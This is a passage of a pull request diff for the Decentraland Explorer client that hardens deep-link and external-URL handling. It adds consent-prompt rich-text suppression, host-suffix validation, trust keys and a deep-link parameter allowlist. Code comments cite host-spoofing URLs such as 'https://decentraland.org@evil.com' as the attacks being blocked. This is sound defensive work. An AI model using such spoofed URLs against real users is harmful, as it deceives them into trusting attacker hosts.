### PR TITLE
fix: harden decentraland:// deep-link & external-URL handling (SEC-003/004/005/008/019/028)

### DIFF
--- a/Explorer/Assets/DCL/ChangeRealmPrompt/ChangeRealmPromptController.Params.cs
+++ b/Explorer/Assets/DCL/ChangeRealmPrompt/ChangeRealmPromptController.Params.cs
@@ -1,4 +1,6 @@
-﻿namespace DCL.ChangeRealmPrompt
+using UnityEngine;
+
+namespace DCL.ChangeRealmPrompt
 {
     public partial class ChangeRealmPromptController
     {
@@ -7,10 +9,21 @@
             public string Message { get; }
             public string Realm { get; }
 
+            /// <summary>Optional target parcel to land on after the realm switch.</summary>
+            public Vector2Int? Position { get; }
+
             public Params(string message, string realm)
             {
                 Message = message;
                 Realm = realm;
+                Position = null;
+            }
+
+            public Params(string message, string realm, Vector2Int position)
+            {
+                Message = message;
+                Realm = realm;
+                Position = position;
             }
         }
     }

--- a/Explorer/Assets/DCL/ChangeRealmPrompt/ChangeRealmPromptController.Params.cs
+++ b/Explorer/Assets/DCL/ChangeRealmPrompt/ChangeRealmPromptController.Params.cs
@@ -12,14 +12,7 @@ namespace DCL.ChangeRealmPrompt
             /// <summary>Optional target parcel to land on after the realm switch.</summary>
             public Vector2Int? Position { get; }
 
-            public Params(string message, string realm)
-            {
-                Message = message;
-                Realm = realm;
-                Position = null;
-            }
-
-            public Params(string message, string realm, Vector2Int position)
+            public Params(string message, string realm, Vector2Int? position = null)
             {
                 Message = message;
                 Realm = realm;

--- a/Explorer/Assets/DCL/ChangeRealmPrompt/ChangeRealmPromptController.cs
+++ b/Explorer/Assets/DCL/ChangeRealmPrompt/ChangeRealmPromptController.cs
@@ -46,7 +46,7 @@ namespace DCL.ChangeRealmPrompt
                 if (result != ChangeRealmPromptResultType.Approved)
                     return;
 
-                changeRealmCallback?.Invoke(inputData.Realm, inputData.Position);
+                changeRealmCallback.Invoke(inputData.Realm, inputData.Position);
             });
         }
 

--- a/Explorer/Assets/DCL/ChangeRealmPrompt/ChangeRealmPromptController.cs
+++ b/Explorer/Assets/DCL/ChangeRealmPrompt/ChangeRealmPromptController.cs
@@ -15,7 +15,7 @@ namespace DCL.ChangeRealmPrompt
 
         private readonly ICursor cursor;
         private readonly Action<string, Vector2Int?> changeRealmCallback;
-        private Action<ChangeRealmPromptResultType> resultCallback;
+        private Action<ChangeRealmPromptResultType>? resultCallback;
 
         public ChangeRealmPromptController(
             ViewFactoryMethod viewFactory,
@@ -28,7 +28,7 @@ namespace DCL.ChangeRealmPrompt
 
         protected override void OnViewInstantiated()
         {
-            viewInstance.CloseButton.onClick.AddListener(Dismiss);
+            viewInstance!.CloseButton.onClick.AddListener(Dismiss);
             viewInstance.CancelButton.onClick.AddListener(Dismiss);
             viewInstance.ContinueButton.onClick.AddListener(Approve);
 
@@ -52,14 +52,14 @@ namespace DCL.ChangeRealmPrompt
 
         protected override UniTask WaitForCloseIntentAsync(CancellationToken ct) =>
             UniTask.WhenAny(
-                viewInstance.CloseButton.OnClickAsync(ct),
+                viewInstance!.CloseButton.OnClickAsync(ct),
                 viewInstance.CancelButton.OnClickAsync(ct),
                 viewInstance.ContinueButton.OnClickAsync(ct));
 
         private void RequestChangeRealm(string message, string realm, Action<ChangeRealmPromptResultType> result)
         {
             resultCallback = result;
-            viewInstance.MessageText.text = string.IsNullOrEmpty(message) ? DEFAULT_CONFIRMATION_MESSAGE : message;
+            viewInstance!.MessageText.text = string.IsNullOrEmpty(message) ? DEFAULT_CONFIRMATION_MESSAGE : message;
             viewInstance.RealmText.text = DestinationHostFor(realm);
         }
 

--- a/Explorer/Assets/DCL/ChangeRealmPrompt/ChangeRealmPromptController.cs
+++ b/Explorer/Assets/DCL/ChangeRealmPrompt/ChangeRealmPromptController.cs
@@ -10,6 +10,8 @@ namespace DCL.ChangeRealmPrompt
     {
         public override CanvasOrdering.SortingLayer Layer => CanvasOrdering.SortingLayer.POPUP;
 
+        private const string DEFAULT_CONFIRMATION_MESSAGE = "Are you sure you want to enter this World?";
+
         private readonly ICursor cursor;
         private readonly Action<string> changeRealmCallback;
         private Action<ChangeRealmPromptResultType> resultCallback;
@@ -28,6 +30,11 @@ namespace DCL.ChangeRealmPrompt
             viewInstance.CloseButton.onClick.AddListener(Dismiss);
             viewInstance.CancelButton.onClick.AddListener(Dismiss);
             viewInstance.ContinueButton.onClick.AddListener(Approve);
+
+            // Message and realm are attacker-controllable (scene changeRealm / deep link). Disable rich-text
+            // parsing so neither can inject TMP markup into this consent prompt (SEC-003; same class as SEC-034/050).
+            viewInstance.MessageText.richText = false;
+            viewInstance.RealmText.richText = false;
         }
 
         protected override void OnViewShow()
@@ -42,28 +49,38 @@ namespace DCL.ChangeRealmPrompt
             });
         }
 
-        protected override UniTask WaitForCloseIntentAsync(CancellationToken ct)
-        {
-            if (string.IsNullOrEmpty(inputData.Message))
-                return UniTask.CompletedTask;
-
-            return UniTask.WhenAny(
+        protected override UniTask WaitForCloseIntentAsync(CancellationToken ct) =>
+            UniTask.WhenAny(
                 viewInstance.CloseButton.OnClickAsync(ct),
                 viewInstance.CancelButton.OnClickAsync(ct),
                 viewInstance.ContinueButton.OnClickAsync(ct));
-        }
 
         private void RequestChangeRealm(string message, string realm, Action<ChangeRealmPromptResultType> result)
         {
             resultCallback = result;
+            viewInstance.MessageText.text = string.IsNullOrEmpty(message) ? DEFAULT_CONFIRMATION_MESSAGE : message;
+            viewInstance.RealmText.text = DestinationHostFor(realm);
+        }
 
-            if (string.IsNullOrEmpty(message))
-                resultCallback?.Invoke(ChangeRealmPromptResultType.Approved);
-            else
-            {
-                viewInstance.MessageText.text = message;
-                viewInstance.RealmText.text = realm;
-            }
+        /// <summary>
+        /// The destination shown to the user: for a URL realm the authority (host[:port]) with any misleading
+        /// path/query stripped; a world name or realm alias is shown unchanged. This — with rich-text disabled
+        /// in <see cref="OnViewInstantiated"/> — is what the user actually consents to.
+        /// </summary>
+        private static string DestinationHostFor(string realm)
+        {
+            int schemeIdx = realm.IndexOf("://", StringComparison.Ordinal);
+
+            if (schemeIdx < 0)
+                return realm;
+
+            int start = schemeIdx + 3;
+            int end = start;
+
+            while (end < realm.Length && realm[end] != '/' && realm[end] != '?' && realm[end] != '#')
+                end++;
+
+            return end > start ? realm.Substring(start, end - start) : realm;
         }
 
         private void Dismiss() =>

--- a/Explorer/Assets/DCL/ChangeRealmPrompt/ChangeRealmPromptController.cs
+++ b/Explorer/Assets/DCL/ChangeRealmPrompt/ChangeRealmPromptController.cs
@@ -69,7 +69,7 @@ namespace DCL.ChangeRealmPrompt
         /// spoof; a world name or realm alias is shown unchanged. This — with rich-text disabled in
         /// <see cref="OnViewInstantiated"/> — is what the user actually consents to.
         /// </summary>
-        private static string DestinationHostFor(string realm)
+        internal static string DestinationHostFor(string realm)
         {
             int schemeIdx = realm.IndexOf("://", StringComparison.Ordinal);
 

--- a/Explorer/Assets/DCL/ChangeRealmPrompt/ChangeRealmPromptController.cs
+++ b/Explorer/Assets/DCL/ChangeRealmPrompt/ChangeRealmPromptController.cs
@@ -65,8 +65,9 @@ namespace DCL.ChangeRealmPrompt
 
         /// <summary>
         /// The destination shown to the user: for a URL realm the authority (host[:port]) with any misleading
-        /// path/query stripped; a world name or realm alias is shown unchanged. This — with rich-text disabled
-        /// in <see cref="OnViewInstantiated"/> — is what the user actually consents to.
+        /// userinfo (<c>https://trusted@evil.com</c>) and path/query stripped, so the true host is shown — not a
+        /// spoof; a world name or realm alias is shown unchanged. This — with rich-text disabled in
+        /// <see cref="OnViewInstantiated"/> — is what the user actually consents to.
         /// </summary>
         private static string DestinationHostFor(string realm)
         {
@@ -79,7 +80,14 @@ namespace DCL.ChangeRealmPrompt
             int end = start;
 
             while (end < realm.Length && realm[end] != '/' && realm[end] != '?' && realm[end] != '#')
+            {
+                // Skip past any userinfo (e.g. https://decentraland.org@evil.com) so the real host after the
+                // last '@' is displayed, not the trusted-looking prefix (consent-prompt spoofing, SEC-004).
+                if (realm[end] == '@')
+                    start = end + 1;
+
                 end++;
+            }
 
             return end > start ? realm.Substring(start, end - start) : realm;
         }

--- a/Explorer/Assets/DCL/ChangeRealmPrompt/ChangeRealmPromptController.cs
+++ b/Explorer/Assets/DCL/ChangeRealmPrompt/ChangeRealmPromptController.cs
@@ -3,6 +3,7 @@ using DCL.Input;
 using MVC;
 using System;
 using System.Threading;
+using UnityEngine;
 
 namespace DCL.ChangeRealmPrompt
 {
@@ -13,13 +14,13 @@ namespace DCL.ChangeRealmPrompt
         private const string DEFAULT_CONFIRMATION_MESSAGE = "Are you sure you want to enter this World?";
 
         private readonly ICursor cursor;
-        private readonly Action<string> changeRealmCallback;
+        private readonly Action<string, Vector2Int?> changeRealmCallback;
         private Action<ChangeRealmPromptResultType> resultCallback;
 
         public ChangeRealmPromptController(
             ViewFactoryMethod viewFactory,
             ICursor cursor,
-            Action<string> changeRealmCallback) : base(viewFactory)
+            Action<string, Vector2Int?> changeRealmCallback) : base(viewFactory)
         {
             this.cursor = cursor;
             this.changeRealmCallback = changeRealmCallback;
@@ -45,7 +46,7 @@ namespace DCL.ChangeRealmPrompt
                 if (result != ChangeRealmPromptResultType.Approved)
                     return;
 
-                changeRealmCallback?.Invoke(inputData.Realm);
+                changeRealmCallback?.Invoke(inputData.Realm, inputData.Position);
             });
         }
 

--- a/Explorer/Assets/DCL/Chat/Commands/ChatEnvironmentValidator.cs
+++ b/Explorer/Assets/DCL/Chat/Commands/ChatEnvironmentValidator.cs
@@ -1,21 +1,19 @@
 using DCL.Multiplayer.Connections.DecentralandUrls;
 using DCL.Utility.Types;
-using UnityEngine.Networking;
+using System;
 
 namespace DCL.Chat.Commands
 {
     public class ChatEnvironmentValidator
     {
-        private readonly DecentralandEnvironment dclEnvironment;
+        private const string ORG_HOST_SUFFIX = "decentraland.org";
+        private const string ZONE_HOST_SUFFIX = "decentraland.zone";
 
-        private readonly string zoneDescription;
-        private readonly string orgDescription;
+        private readonly DecentralandEnvironment dclEnvironment;
 
         public ChatEnvironmentValidator(DecentralandEnvironment dclEnvironment)
         {
             this.dclEnvironment = dclEnvironment;
-            zoneDescription = DecentralandEnvironment.Zone.ToString().ToLower();
-            orgDescription = DecentralandEnvironment.Org.ToString().ToLower();
         }
 
         public Result ValidateTeleport(string realmToTeleportTo)
@@ -26,19 +24,58 @@ namespace DCL.Chat.Commands
                     return Result.ErrorResult(
                         "🔴 Error. You cannot change realms in the Today environment. Please restart DCL with the desired environment");
                 case DecentralandEnvironment.Zone:
-                    if (realmToTeleportTo.Contains(zoneDescription))
-                        return Result.SuccessResult();
-                    return Result.ErrorResult(
-                        "🔴 Error. You cannot teleport to other realms that are not Zone in Zone environment. Please restart DCL with the desired environment");
+                    return HostHasSuffix(realmToTeleportTo, ZONE_HOST_SUFFIX)
+                        ? Result.SuccessResult()
+                        : Result.ErrorResult(
+                            "🔴 Error. You cannot teleport to other realms that are not Zone in Zone environment. Please restart DCL with the desired environment");
                 case DecentralandEnvironment.Org:
-                    if (realmToTeleportTo.Contains(orgDescription))
-                        return Result.SuccessResult();
-
-                    return Result.ErrorResult(
-                        "🔴 Error. You cannot teleport to other realms that are not Org or World in Org environment. Please restart DCL with the desired environment");
+                    return HostHasSuffix(realmToTeleportTo, ORG_HOST_SUFFIX)
+                        ? Result.SuccessResult()
+                        : Result.ErrorResult(
+                            "🔴 Error. You cannot teleport to other realms that are not Org or World in Org environment. Please restart DCL with the desired environment");
             }
 
             return Result.SuccessResult();
+        }
+
+        /// <summary>
+        /// True if the URL's host equals <paramref name="suffix"/> or ends with "." + suffix at a domain
+        /// boundary. Reads the host out of the string via a span (no <see cref="Uri"/> allocation); a URL
+        /// carrying userinfo ('@') is rejected so it cannot spoof the host (e.g. https://decentraland.org@evil).
+        /// </summary>
+        private static bool HostHasSuffix(string url, string suffix)
+        {
+            int schemeIdx = url.IndexOf("://", StringComparison.Ordinal);
+
+            if (schemeIdx < 0)
+                return false;
+
+            int hostStart = schemeIdx + 3;
+            int hostEnd = hostStart;
+
+            while (hostEnd < url.Length)
+            {
+                char c = url[hostEnd];
+
+                if (c == '/' || c == '?' || c == '#' || c == ':')
+                    break;
+
+                // userinfo is not expected in a realm URL; reject rather than risk host-confusion
+                if (c == '@')
+                    return false;
+
+                hostEnd++;
+            }
+
+            ReadOnlySpan<char> host = url.AsSpan(hostStart, hostEnd - hostStart);
+
+            if (host.Equals(suffix, StringComparison.OrdinalIgnoreCase))
+                return true;
+
+            // subdomain boundary match: host ends with ".{suffix}"
+            return host.Length > suffix.Length
+                   && host[host.Length - suffix.Length - 1] == '.'
+                   && host.EndsWith(suffix, StringComparison.OrdinalIgnoreCase);
         }
     }
 }

--- a/Explorer/Assets/DCL/Chat/Commands/ChatEnvironmentValidator.cs
+++ b/Explorer/Assets/DCL/Chat/Commands/ChatEnvironmentValidator.cs
@@ -41,7 +41,8 @@ namespace DCL.Chat.Commands
         /// <summary>
         /// True if the URL's host equals <paramref name="suffix"/> or ends with "." + suffix at a domain
         /// boundary. Reads the host out of the string via a span (no <see cref="Uri"/> allocation); a URL
-        /// carrying userinfo ('@') is rejected so it cannot spoof the host (e.g. https://decentraland.org@evil).
+        /// carrying userinfo ('@') is rejected so it cannot spoof the host — the '@' is checked before any ':'
+        /// so a colon-before-'@' form (https://decentraland.org:1234@evil.com) cannot slip past the guard.
         /// </summary>
         private static bool HostHasSuffix(string url, string suffix)
         {
@@ -51,23 +52,27 @@ namespace DCL.Chat.Commands
                 return false;
 
             int hostStart = schemeIdx + 3;
-            int hostEnd = hostStart;
+            int authorityEnd = hostStart;
 
-            while (hostEnd < url.Length)
+            while (authorityEnd < url.Length)
             {
-                char c = url[hostEnd];
+                char c = url[authorityEnd];
 
-                if (c == '/' || c == '?' || c == '#' || c == ':')
+                if (c == '/' || c == '?' || c == '#')
                     break;
 
-                // userinfo is not expected in a realm URL; reject rather than risk host-confusion
+                // userinfo is not expected in a realm URL; reject rather than risk host-confusion. Checked BEFORE
+                // any ':' so https://decentraland.org:1234@evil.com (port before userinfo) can't slip past.
                 if (c == '@')
                     return false;
 
-                hostEnd++;
+                authorityEnd++;
             }
 
-            ReadOnlySpan<char> host = url.AsSpan(hostStart, hostEnd - hostStart);
+            // Strip the port (if any) from the authority to get the bare host.
+            ReadOnlySpan<char> authority = url.AsSpan(hostStart, authorityEnd - hostStart);
+            int portSep = authority.IndexOf(':');
+            ReadOnlySpan<char> host = portSep >= 0 ? authority.Slice(0, portSep) : authority;
 
             if (host.Equals(suffix, StringComparison.OrdinalIgnoreCase))
                 return true;

--- a/Explorer/Assets/DCL/ExternalUrlPrompt/ExternalUrlPromptController.Params.cs
+++ b/Explorer/Assets/DCL/ExternalUrlPrompt/ExternalUrlPromptController.Params.cs
@@ -7,7 +7,8 @@ namespace DCL.ExternalUrlPrompt
     {
         public struct Params
         {
-            public Uri Uri { get; }
+            /// <summary>Null when <c>url</c> is not an absolute http/https URL — callers must null-check.</summary>
+            public Uri? Uri { get; }
 
             public Params(string url)
             {

--- a/Explorer/Assets/DCL/ExternalUrlPrompt/ExternalUrlPromptController.Params.cs
+++ b/Explorer/Assets/DCL/ExternalUrlPrompt/ExternalUrlPromptController.Params.cs
@@ -1,4 +1,5 @@
-﻿using System;
+﻿using DCL.Browser;
+using System;
 
 namespace DCL.ExternalUrlPrompt
 {
@@ -10,7 +11,9 @@ namespace DCL.ExternalUrlPrompt
 
             public Params(string url)
             {
-                Uri = Uri.TryCreate(url, UriKind.Absolute, out Uri uri) ? uri : null;
+                Uri = ExternalUrlPolicy.IsWebScheme(url) && Uri.TryCreate(url, UriKind.Absolute, out Uri uri)
+                    ? uri
+                    : null;
             }
         }
     }

--- a/Explorer/Assets/DCL/ExternalUrlPrompt/ExternalUrlPromptController.cs
+++ b/Explorer/Assets/DCL/ExternalUrlPrompt/ExternalUrlPromptController.cs
@@ -14,7 +14,7 @@ namespace DCL.ExternalUrlPrompt
 
         private readonly UnityAppWebBrowser webBrowser;
         private readonly ICursor cursor;
-        private readonly List<string> trustedDomains = new ();
+        private readonly HashSet<string> trustedKeys = new ();
         private Action<ExternalUrlPromptResultType> resultCallback;
 
         public ExternalUrlPromptController(
@@ -38,7 +38,7 @@ namespace DCL.ExternalUrlPrompt
             if (inputData.Uri == null)
                 return;
 
-            if (trustedDomains.Contains(inputData.Uri.Host))
+            if (ExternalUrlPolicy.TryGetTrustKey(inputData.Uri, out string trustKey) && trustedKeys.Contains(trustKey))
             {
                 webBrowser.OpenUrlMainThreadOnly(inputData.Uri.OriginalString);
                 viewInstance.CloseButton.OnClickAsync(CancellationToken.None).Forget();
@@ -51,8 +51,9 @@ namespace DCL.ExternalUrlPrompt
                 switch (result)
                 {
                     case ExternalUrlPromptResultType.ApprovedTrusted:
-                        if (!trustedDomains.Contains(inputData.Uri.Host))
-                            trustedDomains.Add(inputData.Uri.Host);
+                        // Only cache when a real (scheme, host) key exists — empty-host URIs are never trusted (SEC-008).
+                        if (ExternalUrlPolicy.TryGetTrustKey(inputData.Uri, out string key))
+                            trustedKeys.Add(key);
                         webBrowser.OpenUrlMainThreadOnly(inputData.Uri.OriginalString);
                         break;
                     case ExternalUrlPromptResultType.Approved:
@@ -64,7 +65,9 @@ namespace DCL.ExternalUrlPrompt
 
         protected override UniTask WaitForCloseIntentAsync(CancellationToken ct)
         {
-            if (inputData.Uri != null && trustedDomains.Contains(inputData.Uri.Host))
+            if (inputData.Uri != null
+                && ExternalUrlPolicy.TryGetTrustKey(inputData.Uri, out string trustKey)
+                && trustedKeys.Contains(trustKey))
                 return UniTask.CompletedTask;
 
             return UniTask.WhenAny(
@@ -75,7 +78,7 @@ namespace DCL.ExternalUrlPrompt
 
         public override void Dispose()
         {
-            trustedDomains.Clear();
+            trustedKeys.Clear();
         }
 
         private void RequestOpenUrl(Uri uri, Action<ExternalUrlPromptResultType> result)

--- a/Explorer/Assets/DCL/ExternalUrlPrompt/ExternalUrlPromptController.cs
+++ b/Explorer/Assets/DCL/ExternalUrlPrompt/ExternalUrlPromptController.cs
@@ -38,26 +38,28 @@ namespace DCL.ExternalUrlPrompt
             if (inputData.Uri == null)
                 return;
 
-            if (ExternalUrlPolicy.TryGetTrustKey(inputData.Uri, out string trustKey) && trustedKeys.Contains(trustKey))
+            Uri uri = inputData.Uri;
+
+            if (ExternalUrlPolicy.TryGetTrustKey(uri, out string trustKey) && trustedKeys.Contains(trustKey))
             {
-                webBrowser.OpenUrlMainThreadOnly(inputData.Uri.OriginalString);
+                webBrowser.OpenUrlMainThreadOnly(uri.OriginalString);
                 viewInstance.CloseButton.OnClickAsync(CancellationToken.None).Forget();
                 return;
             }
 
             cursor.Unlock();
-            RequestOpenUrl(inputData.Uri, result =>
+            RequestOpenUrl(uri, result =>
             {
                 switch (result)
                 {
                     case ExternalUrlPromptResultType.ApprovedTrusted:
                         // Only cache when a real (scheme, host) key exists — empty-host URIs are never trusted (SEC-008).
-                        if (ExternalUrlPolicy.TryGetTrustKey(inputData.Uri, out string key))
+                        if (ExternalUrlPolicy.TryGetTrustKey(uri, out string key))
                             trustedKeys.Add(key);
-                        webBrowser.OpenUrlMainThreadOnly(inputData.Uri.OriginalString);
+                        webBrowser.OpenUrlMainThreadOnly(uri.OriginalString);
                         break;
                     case ExternalUrlPromptResultType.Approved:
-                        webBrowser.OpenUrlMainThreadOnly(inputData.Uri.OriginalString);
+                        webBrowser.OpenUrlMainThreadOnly(uri.OriginalString);
                         break;
                 }
             });

--- a/Explorer/Assets/DCL/ExternalUrlPrompt/ExternalUrlPromptController.cs
+++ b/Explorer/Assets/DCL/ExternalUrlPrompt/ExternalUrlPromptController.cs
@@ -15,7 +15,7 @@ namespace DCL.ExternalUrlPrompt
         private readonly UnityAppWebBrowser webBrowser;
         private readonly ICursor cursor;
         private readonly HashSet<string> trustedKeys = new ();
-        private Action<ExternalUrlPromptResultType> resultCallback;
+        private Action<ExternalUrlPromptResultType>? resultCallback;
 
         public ExternalUrlPromptController(
             ViewFactoryMethod viewFactory,
@@ -28,7 +28,7 @@ namespace DCL.ExternalUrlPrompt
 
         protected override void OnViewInstantiated()
         {
-            viewInstance.CloseButton.onClick.AddListener(Dismiss);
+            viewInstance!.CloseButton.onClick.AddListener(Dismiss);
             viewInstance.CancelButton.onClick.AddListener(Dismiss);
             viewInstance.ContinueButton.onClick.AddListener(Approve);
         }
@@ -43,7 +43,7 @@ namespace DCL.ExternalUrlPrompt
             if (ExternalUrlPolicy.TryGetTrustKey(uri, out string trustKey) && trustedKeys.Contains(trustKey))
             {
                 webBrowser.OpenUrlMainThreadOnly(uri.OriginalString);
-                viewInstance.CloseButton.OnClickAsync(CancellationToken.None).Forget();
+                viewInstance!.CloseButton.OnClickAsync(CancellationToken.None).Forget();
                 return;
             }
 
@@ -86,7 +86,7 @@ namespace DCL.ExternalUrlPrompt
         private void RequestOpenUrl(Uri uri, Action<ExternalUrlPromptResultType> result)
         {
             resultCallback = result;
-            viewInstance.DomainText.text = uri.Host;
+            viewInstance!.DomainText.text = uri.Host;
             viewInstance.UrlText.text = uri.OriginalString;
             viewInstance.TrustToggle.isOn = false;
         }
@@ -95,6 +95,6 @@ namespace DCL.ExternalUrlPrompt
             resultCallback?.Invoke(ExternalUrlPromptResultType.Canceled);
 
         private void Approve() =>
-            resultCallback?.Invoke(viewInstance.TrustToggle.isOn ? ExternalUrlPromptResultType.ApprovedTrusted : ExternalUrlPromptResultType.Approved);
+            resultCallback?.Invoke(viewInstance!.TrustToggle.isOn ? ExternalUrlPromptResultType.ApprovedTrusted : ExternalUrlPromptResultType.Approved);
     }
 }

--- a/Explorer/Assets/DCL/Infrastructure/Global/AppArgs/AppArgsFlags.cs
+++ b/Explorer/Assets/DCL/Infrastructure/Global/AppArgs/AppArgsFlags.cs
@@ -64,6 +64,7 @@ namespace Global.AppArgs
         public const string SIMULATE_MEMORY = "simulateMemory";
 
         public const string LAUNCH_CDP_MONITOR_ON_START = "launch-cdp-monitor-on-start";
+        public const string CREATOR_HUB_BIN_PATH = "creator-hub-bin-path";
 
         public const string USE_LOG_MATRIX = "use-log-matrix";
         public const string GRAPHICS = "graphics";

--- a/Explorer/Assets/DCL/Infrastructure/Global/AppArgs/AppArgsFlags.cs
+++ b/Explorer/Assets/DCL/Infrastructure/Global/AppArgs/AppArgsFlags.cs
@@ -64,7 +64,6 @@ namespace Global.AppArgs
         public const string SIMULATE_MEMORY = "simulateMemory";
 
         public const string LAUNCH_CDP_MONITOR_ON_START = "launch-cdp-monitor-on-start";
-        public const string CREATOR_HUB_BIN_PATH = "creator-hub-bin-path";
 
         public const string USE_LOG_MATRIX = "use-log-matrix";
         public const string GRAPHICS = "graphics";

--- a/Explorer/Assets/DCL/Infrastructure/Global/AppArgs/ApplicationParametersParser.cs
+++ b/Explorer/Assets/DCL/Infrastructure/Global/AppArgs/ApplicationParametersParser.cs
@@ -101,12 +101,24 @@ namespace Global.AppArgs
             var uri = new Uri(deepLinkString);
             NameValueCollection uriQuery = HttpUtility.ParseQueryString(uri.Query);
 
+            var droppedKeys = new List<string>();
+
             foreach (string uriQueryKey in uriQuery.AllKeys)
             {
                 // if the deep link is not constructed correctly (AKA 'decentraland://?&blabla=blabla') a 'null' parameter can be detected...
                 if (uriQueryKey == null) continue;
+
+                if (!DeepLinkAllowlist.IsPermitted(uriQueryKey))
+                {
+                    droppedKeys.Add(uriQueryKey);
+                    continue;
+                }
+
                 output[uriQueryKey] = uriQuery.Get(uriQueryKey);
             }
+
+            if (droppedKeys.Count > 0)
+                ReportHub.Log(ReportCategory.RUNTIME_DEEPLINKS, $"Dropped {droppedKeys.Count} non-allowlisted deep-link param(s): {string.Join(", ", droppedKeys)}");
 
             if (output.TryGetValue(AppArgsFlags.REALM, out string? realmParamValue))
             {
@@ -120,9 +132,16 @@ namespace Global.AppArgs
                 output[AppArgsFlags.REALM] = realmParamValue;
             }
 
-            // Patch for WinOS sometimes affecting the 'skip-auth-screen' parameter in deep links putting a '/' at the end
-            if (output.TryGetValue(AppArgsFlags.SKIP_AUTH_SCREEN, out string? value) && value?.EndsWith('/') == true)
-                output[AppArgsFlags.SKIP_AUTH_SCREEN] = value[..^1];
+            // SEC-020: local-scene enables local-scene-development mode, which opens a websocket to the realm.
+            // It is dropped by default (an attacker deep link could point it at a remote realm), but the
+            // legitimate local-scene-dev deep link targets a loopback realm — permit it only in that case.
+            string? localSceneValue = uriQuery.Get(AppArgsFlags.LOCAL_SCENE);
+
+            if (localSceneValue != null
+                && output.TryGetValue(AppArgsFlags.REALM, out string? lsdRealm)
+                && Uri.TryCreate(lsdRealm, UriKind.Absolute, out Uri? lsdRealmUri)
+                && lsdRealmUri.IsLoopback)
+                output[AppArgsFlags.LOCAL_SCENE] = localSceneValue;
 
             return output;
         }

--- a/Explorer/Assets/DCL/Infrastructure/Global/AppArgs/ApplicationParametersParser.cs
+++ b/Explorer/Assets/DCL/Infrastructure/Global/AppArgs/ApplicationParametersParser.cs
@@ -118,7 +118,7 @@ namespace Global.AppArgs
             }
 
             if (droppedKeys.Count > 0)
-                ReportHub.Log(ReportCategory.RUNTIME_DEEPLINKS, $"Dropped {droppedKeys.Count} non-allowlisted deep-link param(s): {string.Join(", ", droppedKeys)}");
+                ReportHub.LogWarning(ReportCategory.ALWAYS, $"Dropped {droppedKeys.Count} non-allowlisted deep-link param(s): {string.Join(", ", droppedKeys)}");
 
             if (output.TryGetValue(AppArgsFlags.REALM, out string? realmParamValue))
             {

--- a/Explorer/Assets/DCL/Infrastructure/Global/AppArgs/ApplicationParametersParser.cs
+++ b/Explorer/Assets/DCL/Infrastructure/Global/AppArgs/ApplicationParametersParser.cs
@@ -103,22 +103,15 @@ namespace Global.AppArgs
 
             var droppedKeys = new List<string>();
 
+            // Tier 1: always-permitted (base) navigation/login params.
             foreach (string uriQueryKey in uriQuery.AllKeys)
             {
                 // if the deep link is not constructed correctly (AKA 'decentraland://?&blabla=blabla') a 'null' parameter can be detected...
                 if (uriQueryKey == null) continue;
 
-                if (!DeepLinkAllowlist.IsPermitted(uriQueryKey))
-                {
-                    droppedKeys.Add(uriQueryKey);
-                    continue;
-                }
-
-                output[uriQueryKey] = uriQuery.Get(uriQueryKey);
+                if (DeepLinkAllowlist.IsPermitted(uriQueryKey))
+                    output[uriQueryKey] = uriQuery.Get(uriQueryKey);
             }
-
-            if (droppedKeys.Count > 0)
-                ReportHub.LogWarning(ReportCategory.ALWAYS, $"Dropped {droppedKeys.Count} non-allowlisted deep-link param(s): {string.Join(", ", droppedKeys)}");
 
             if (output.TryGetValue(AppArgsFlags.REALM, out string? realmParamValue))
             {
@@ -132,16 +125,26 @@ namespace Global.AppArgs
                 output[AppArgsFlags.REALM] = realmParamValue;
             }
 
-            // SEC-020: local-scene enables local-scene-development mode, which opens a websocket to the realm.
-            // It is dropped by default (an attacker deep link could point it at a remote realm), but the
-            // legitimate local-scene-dev deep link targets a loopback realm — permit it only in that case.
-            string? localSceneValue = uriQuery.Get(AppArgsFlags.LOCAL_SCENE);
+            // Tier 2 (SEC-019/020): the local-development params Creator Hub / sdk-commands attach to preview deep
+            // links (local-scene, dclenv, hub, skip-auth-screen, landscape-terrain-enabled, multi-instance) are
+            // permitted only when the target realm is loopback — a remote-realm deep link from a web page cannot
+            // enable them. Everything not in either tier is dropped.
+            bool realmIsLoopback = output.TryGetValue(AppArgsFlags.REALM, out string? loopbackRealm)
+                                   && Uri.TryCreate(loopbackRealm, UriKind.Absolute, out Uri? loopbackRealmUri)
+                                   && loopbackRealmUri.IsLoopback;
 
-            if (localSceneValue != null
-                && output.TryGetValue(AppArgsFlags.REALM, out string? lsdRealm)
-                && Uri.TryCreate(lsdRealm, UriKind.Absolute, out Uri? lsdRealmUri)
-                && lsdRealmUri.IsLoopback)
-                output[AppArgsFlags.LOCAL_SCENE] = localSceneValue;
+            foreach (string uriQueryKey in uriQuery.AllKeys)
+            {
+                if (uriQueryKey == null || output.ContainsKey(uriQueryKey)) continue;
+
+                if (realmIsLoopback && DeepLinkAllowlist.IsPermittedForLoopbackRealm(uriQueryKey))
+                    output[uriQueryKey] = uriQuery.Get(uriQueryKey);
+                else
+                    droppedKeys.Add(uriQueryKey);
+            }
+
+            if (droppedKeys.Count > 0)
+                ReportHub.LogWarning(ReportCategory.ALWAYS, $"Dropped {droppedKeys.Count} non-allowlisted deep-link param(s): {string.Join(", ", droppedKeys)}");
 
             return output;
         }

--- a/Explorer/Assets/DCL/Infrastructure/Global/AppArgs/DeepLinkAllowlist.cs
+++ b/Explorer/Assets/DCL/Infrastructure/Global/AppArgs/DeepLinkAllowlist.cs
@@ -15,7 +15,7 @@ namespace Global.AppArgs
     ///         <item>
     ///             <b>Always permitted</b> — benign navigation / share / login intents whose worst case is already
     ///             gated elsewhere (a consent prompt, a matching login token, or a plain coordinate): realm,
-    ///             position, spawnpoint, community, signin, authRequestId, force-open-backpack.
+    ///             position, community, signin, authRequestId, force-open-backpack.
     ///         </item>
     ///         <item>
     ///             <b>Permitted only for a loopback realm</b> — the local-development params Creator Hub and the

--- a/Explorer/Assets/DCL/Infrastructure/Global/AppArgs/DeepLinkAllowlist.cs
+++ b/Explorer/Assets/DCL/Infrastructure/Global/AppArgs/DeepLinkAllowlist.cs
@@ -8,28 +8,36 @@ namespace Global.AppArgs
     ///     Shared by the cold-start argv path and the runtime bridge path (both funnel through
     ///     <see cref="ApplicationParametersParser.ProcessDeepLinkParameters" />).
     ///     <para>
-    ///     A deep link is fully attacker-controllable — anyone can craft one and get a victim to open it — so a
-    ///     param is permitted only when it is a benign navigation / share / login intent whose worst case is
-    ///     already gated elsewhere (a consent prompt, a matching login token, or a plain coordinate). Everything
-    ///     else is dropped. In particular we never permit params that:
